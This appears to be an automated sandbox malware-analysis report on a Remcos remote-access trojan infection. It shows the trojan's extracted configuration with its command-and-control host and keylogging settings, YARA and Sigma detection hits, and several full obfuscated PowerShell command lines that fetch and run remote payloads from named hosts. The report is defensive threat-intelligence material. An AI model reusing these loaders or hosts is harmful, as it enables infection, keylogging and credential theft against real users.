{"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000017.00000002.879261278.00000000008B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000017.00000002.879514002.000000000090E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000001F.00000002.527567335.00000000007F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000017.00000002.879261278.0000000000895000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000017.00000002.879514002.0000000000901000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 29 entries
              SourceRuleDescriptionAuthorStrings
              31.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                31.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  31.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    31.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aab8:$a1: Remcos restarted by watchdog!
                    • 0x6b030:$a3: %02i:%02i:%02i:%03i
                    31.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b7c:$str_b2: Executing file:
                    • 0x65bfc:$str_b3: GetDirectListeningPort
                    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65728:$str_b7: \update.vbs
                    • 0x64ba4:$str_b9: Downloaded file:
                    • 0x64b90:$str_b10: Downloading file:
                    • 0x64c34:$str_b12: Failed to upload file:
                    • 0x65bc4:$str_b13: StartForward
                    • 0x65be4:$str_b14: StopForward
                    • 0x65680:$str_b15: fso.DeleteFile "
                    • 0x65614:$str_b16: On Error Resume Next
                    • 0x656b0:$str_b17: fso.DeleteFolder "
                    • 0x64c24:$str_b18: Uploaded file:
                    • 0x64be4:$str_b19: Unable to delete:
                    • 0x65648:$str_b20: while fso.FileExists("
                    • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 19 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21t
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\verynicepersonupdation[1].hta
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3968, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" , ProcessId: 2632, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21t
